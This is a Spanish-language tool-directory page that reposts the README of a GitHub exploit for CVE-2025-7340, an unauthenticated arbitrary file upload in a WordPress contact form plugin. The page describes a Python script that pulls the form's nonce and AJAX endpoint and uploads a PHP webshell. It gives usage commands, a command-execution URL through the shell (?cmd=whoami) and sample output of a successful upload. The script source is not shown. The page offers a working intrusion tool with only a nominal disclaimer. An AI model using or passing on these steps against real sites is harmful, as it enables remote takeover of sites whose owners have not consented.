Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-7340 — HT Contact Form Widget para Elementor Page Builder y Gutenberg Blocks y Form Builder. <= 2.2.1 - Subida de archivos arbitraria no autenticada | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-7340
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget para Elementor Page Builder y Gutenberg Blocks y Form Builder. <= 2.2.1 - Subida de archivos arbitraria no autenticada

Ver Repositorio
7hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 HT Contact Form Widget <= 2.2.1 - Carga Arbitraria de Archivos no Autenticada (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (Crítica)

📝 Descripción

El complemento HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. para WordPress es vulnerable a cargas arbitrarias de archivos debido a la falta de validación del tipo de archivo en la función temp_file_upload en todas las versiones hasta 2.2.1 inclusive.

Esto permite a atacantes no autenticados cargar archivos arbitrarios en el servidor, lo que potencialmente conduce a Ejecución Remota de Código (RCE).


⚡ Script de Exploit

Este repositorio incluye un script de exploit en Python que automatiza el descubrimiento del formulario vulnerable y sube una webshell al sitio afectado.

El script detecta inteligentemente los parámetros requeridos (nonce, form_id, ajax endpoint) y sube una shell PHP a la ruta vulnerable.

✅ Ejemplo de URL de formulario vulnerable:

root@kitploit:~
http://target.com/contact/

✅ El formulario vulnerable debe estar en la página que le pases a la opción -u.


📦 Requisitos

Antes de ejecutar el script, instala los módulos de Python requeridos:

root@kitploit:~
pip install -r requirements.txt

Contenido de requirements.txt:

root@kitploit:~
requests
colorama

🧰 Uso

root@kitploit:~
usage: CVE-2025-7340.py [-h] 

Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com

Opciones:

OpciónDescripción
-h, --helpMuestra este mensaje de ayuda y sale
-u, --url URLURL objetivo, p.ej. http(s)://target.com/contact

🐚 Uso de Webshell

Una vez que el exploit finalice exitosamente, puedes acceder a tu shell subida en la ruta indicada.

Agrega ?cmd=<your_command> para ejecutar comandos del sistema.

✅ Ejemplo:

root@kitploit:~
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ Ejemplo de Salida

root@kitploit:~
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...

[+] Exploit Successfully!

Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 Descargo de Responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de investigación.
El autor no se hace responsable de ningún daño o uso indebido de este código.
Siempre obtén permiso explícito antes de realizar pruebas contra cualquier sistema.


👨‍💻 Por

Khaled Alenazi (Nxploited)
GitHub: Nxploited

Descargar herramienta